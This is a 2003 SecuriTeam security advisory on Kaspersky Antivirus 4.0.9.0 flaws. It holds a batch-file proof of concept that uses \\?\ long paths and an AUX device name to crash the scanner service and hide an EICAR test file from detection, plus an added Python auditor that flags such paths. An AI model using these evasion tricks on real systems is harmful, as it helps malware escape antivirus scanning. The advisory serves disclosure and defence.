[NT] Kaspersky Antivirus DoS (Long Path, AUX)

From: support@securiteam.com
Date: 02/15/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Feb 2003 21:48:18 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Kaspersky Antivirus DoS (Long Path, AUX)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.kaspersky.com/> Kaspersky Antivirus (KAV) is a family of
    antiviral products.

    Several vulnerabilities were identified in these products. The most serious
    one allows a user to crash the antiviral server remotely (write access to
    any directory on the remote server is required):
    1. Long path crash
    2. Long path prevents malware from detection
    3. Special name prevents malware from detection

    DETAILS

    Vulnerable systems:
     * Kaspersky Antivirus version 4.0.9.0

    1. Long path crash
    The NTFS file system allows creating paths of almost unlimited length.
    However, the Windows API does not allow a path longer than 256 bytes. To
    prevent the Windows API from checking the requested path, the \\?\ prefix
    may be added to the filename. This is a documented feature of the Windows
    API. Paths longer than 256 characters will cause the KAV monitor service to
    crash or hang with 100% CPU usage. The possibility of code execution was
    not researched.

    2. Long path prevents malware from detection
    A long path also prevents malware from being detected by the antiviral scanner.

    3. Special name prevents malware from detection
    It is possible to create an NTFS file with a name such as aux.vbs or
    aux.com. Malware in such a file will not be detected.

    Exploit:
    This .bat file demonstrates the vulnerabilities.

    1,2 Long path crash & Long path prevents malware from detection
    @echo off
    REM A is one long directory name; nested several levels deep the path exceeds the Win32 limit.
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    REM The \\?\ prefix makes the Win32 API skip its path-length check.
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
    REM Write the EICAR test string (%% and ^^ are batch escapes for % and ^) to a .com file at the end of the long path.
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

    3. Special name prevents malware from detection

    REM The \\?\ prefix also allows creating a file whose name is a reserved DOS device name (AUX).
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\aux.com
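    The following is an added defender-side example, not part of the SecuriTeam advisory or of any Kaspersky code. It audits file paths for the two scanner blind spots described in sections 1 to 3: paths that exceed the Win32 length limit (reachable only through the \\?\ prefix) and file names that collide with reserved DOS device names such as AUX. The function names, the 260-character limit (the Win32 MAX_PATH constant; the advisory quotes 256) and the sample paths are all assumptions made for this example.

```python
# Added example: audit file paths for the blind spots the advisory describes.
# Not the advisory's or Kaspersky's code; names and sample data are constructed.
import os

# Win32 MAX_PATH is 260 characters including the terminating NUL. The advisory
# quotes 256; paths at or beyond this length can only exist via the \\?\ prefix.
MAX_PATH = 260

# Reserved DOS device names. Windows matches the part of the file name before
# the first dot, case-insensitively, so aux.com and AUX.vbs both collide.
RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# The extended-length prefix: a literal backslash, backslash, question mark, backslash.
EXTENDED_PREFIX = "\\\\?\\"


def strip_extended_prefix(path):
    # Remove the extended-length prefix so the path's real length can be measured.
    if path.startswith(EXTENDED_PREFIX):
        return path[len(EXTENDED_PREFIX):]
    return path


def exceeds_max_path(path, limit=MAX_PATH):
    # True when the path is too long for the plain Win32 API, i.e. it could only
    # have been created through the extended-length prefix.
    return len(strip_extended_prefix(path)) >= limit


def has_reserved_device_name(path):
    # True when the final path component is a reserved DOS device name.
    name = strip_extended_prefix(path).replace("/", "\\").rsplit("\\", 1)[-1]
    stem = name.split(".", 1)[0].rstrip(" ")   # Windows ignores trailing spaces
    return stem.upper() in RESERVED_DEVICE_NAMES


def audit_paths(paths, limit=MAX_PATH):
    # Return [(path, [reasons])] for every path a scanner bound by Win32 rules may skip.
    findings = []
    for p in paths:
        reasons = []
        if exceeds_max_path(p, limit):
            reasons.append("long-path")
        if has_reserved_device_name(p):
            reasons.append("reserved-device-name")
        if reasons:
            findings.append((p, reasons))
    return findings


def walk_volume(root):
    # Enumerate a real directory tree. On Windows the root is given with the
    # extended-length prefix so os.walk itself is not stopped by MAX_PATH.
    start = EXTENDED_PREFIX + os.path.abspath(root) if os.name == "nt" else root
    for dirpath, _dirs, files in os.walk(start):
        for f in files:
            yield os.path.join(dirpath, f)


# Constructed sample paths modelled on the advisory's proof of concept.
LONG_COMPONENT = "A" * 203
SAMPLE_PATHS = [
    "c:\\Program Files\\app\\readme.txt",
    "c:\\auxiliary-notes.txt",
    EXTENDED_PREFIX + "c:\\aux.com",
    EXTENDED_PREFIX + "c:\\" + "\\".join([LONG_COMPONENT] * 7) + ".com",
]

if __name__ == "__main__":
    for path, reasons in audit_paths(SAMPLE_PATHS):
        shown = path if len(path) <= 60 else path[:60] + "..."
        print(", ".join(reasons), "->", shown)
```

    Run on a live volume with `audit_paths(walk_volume("C:\\"))`; any finding is a file the on-access scanner may not have examined and is worth submitting to the scanner by hand or quarantining by policy.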

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
    ZARAZA.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
